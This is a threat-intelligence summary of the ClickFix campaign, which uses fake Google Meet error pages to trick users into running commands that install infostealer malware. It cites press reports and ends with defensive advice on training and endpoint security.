Introduction
The ClickFix campaign represents a sophisticated social engineering threat targeting Google Meet users through phishing emails that mimic legitimate video call invitations. This campaign is particularly concerning due to its focus on distributing info-stealing malware, with a specific emphasis on cryptocurrency and decentralized finance users.
Description
Threat actors are increasingly targeting Google Meet users through a sophisticated social engineering campaign known as ClickFix, which employs convincing phishing emails that mimic legitimate video call invitations. These emails contain deceptive URLs resembling actual Google Meet links, such as meet[ ]google[ ]us-join[ ]com and meet[ ]googie[ ]com-join[ ]us, leading users to counterfeit Google Meet landing pages designed to distribute info-stealing malware. Initially identified as a variant of ClearFake in May 2024, this campaign has broadened its scope to specifically target cryptocurrency and decentralized finance users [9], as well as additional platforms and regions, including the United States and Japan [5].
ClickFix exploits misleading error messages related to microphone or camera issues on fake Google Meet pages to create a sense of urgency, tricking users into clicking a “Try Fix” button. This action initiates the infection process by executing malicious code that installs malware, bypassing browser security protections like Google Safe Browsing. Users are often directed to join fraudulent meetings [8], as it is unlikely that such malware installations would occur through legitimate Google Meetings. The campaign has been linked to two cybercrime groups: Slavic Nation Empire (SNE) and Scamquerteo, both associated with cryptocurrency scams and sub-groups of larger networks like Marko Polo and CryptoLove. Investigations reveal that these groups utilize shared infrastructure [3], indicating collaboration among multiple threat actors within a centralized Traffers team [3], which raises the possibility that they may be leveraging a common [6], unidentified cybercrime service for their operations [6].
Cybersecurity firm Proofpoint has noted that this tactic has been increasingly adopted by various threat actors [2], including the initial access broker TA571 [2] [4], to deliver a range of malware types such as DarkGate, Matanbuchus [1] [2] [4], NetSupport [1] [2] [4], Amadey Loader [1], and AMOS Stealer [1] [3] [4] [5] [7] [10], all designed to steal sensitive information and establish remote access [1]. For Windows users [2] [3] [4] [7], clicking the “Try Fix” button copies a command that leads to an HTML file containing an obfuscated VBScript [4]. This script executes two payloads: Stealc and Rhadamanthys [4], both protected by the HijackLoader crypter [4]. The command-and-control (C2) servers for these payloads are known and tracked by cybersecurity analysts [4]. On macOS [1] [3] [4] [5] [6], the “Try Fix” button downloads a file identified as AMOS Stealer [4], disguised as a .DMG file named “Launcher_v194,” which communicates with its own C2 server. This infrastructure includes JavaScript code that connects to a MongoDB database to gather user statistics and send them to Telegram bots [4].
The ClickFix campaign highlights the increasing sophistication of social engineering tactics [5], as attackers exploit fake Google Meet conference pages to compromise users with dangerous malware [5]. As virtual meetings become essential in business operations [5], it is crucial for users to remain vigilant when clicking on conference links [5], ensuring they verify URLs and refrain from executing unsolicited scripts or commands [5]. Continuous vigilance is necessary [9], as cybercriminals are likely to develop more creative methods to exploit trusted platforms [9].
The ClickFix campaign has gained traction [2] [7], with multiple independent researchers reporting on its activities [2]. Variants of this campaign [2], including OneDrive Pastejacking [2] [6], have been frequently observed [2]. The emergence of malware campaigns distributing open-source infostealers [6], such as ThunderKitty [6], Skuld [6], and Kematian Stealer [6], along with new families like Divulge [6], DedSec [6], Duck [6], Vilsa [6], and Yunit [6], signifies a notable shift in cyber threats [6]. The availability of open-source tools lowers entry barriers and encourages rapid innovation [6], potentially leading to an increase in computer infections and heightened risks for businesses and individuals [6]. Despite the concerning rise of this tactic [2], the significant user interaction required for success offers some hope [2], suggesting that aggressive enterprise training could effectively mitigate these threats [2]. Companies are advised to implement endpoint security solutions to protect against evolving cyber threats and prioritize cybersecurity awareness training to educate employees about unsolicited links and verifying meeting invitations through official channels. By remaining informed and vigilant [1], users can better protect themselves against info-stealing malware campaigns like ClickFix [1].
Conclusion
The ClickFix campaign underscores the growing sophistication of cyber threats, particularly in the realm of social engineering. As attackers continue to exploit trusted platforms like Google Meet, it is imperative for users and organizations to enhance their cybersecurity measures. Implementing robust endpoint security solutions and conducting comprehensive cybersecurity awareness training can significantly mitigate the risks posed by such campaigns. As the landscape of cyber threats evolves, continuous vigilance and proactive measures will be essential in safeguarding sensitive information and maintaining the integrity of virtual communications.
References
[1] https://cybermaterial.com/fake-google-meet-errors-spread-info-stealers/
[2] https://www.csoonline.com/article/3570506/the-google-meet-error-you-last-saw-could-be-someone-trying-to-hack-your-system.html
[3] https://www.msspalert.com/brief/phony-google-meet-alerts-deploying-infostealers
[4] https://www.infostealers.com/article/clickfix-tactic-the-phantom-meet-infostealers/
[5] https://blogs.npav.net/blogs/post/fake-google-meet-errors-used-in-clickfix-campaigns-to-spread-infostealing-malware
[6] https://thehackernews.com/2024/10/beware-fake-google-meet-pages-deliver.html
[7] https://www.helpnetsecurity.com/2024/10/17/google-meet-fix-it-infostealers/
[8] https://it.slashdot.org/story/24/10/17/2156214/fake-google-meet-conference-errors-push-infostealing-malware
[9] https://www.forbes.com/sites/daveywinder/2024/10/18/hackers-avoid-google-chrome-security-features-in-new-attack-researchers-warn/
[10] https://www.techradar.com/pro/security/that-google-meet-invite-could-be-a-fake-hiding-some-dangerous-malware
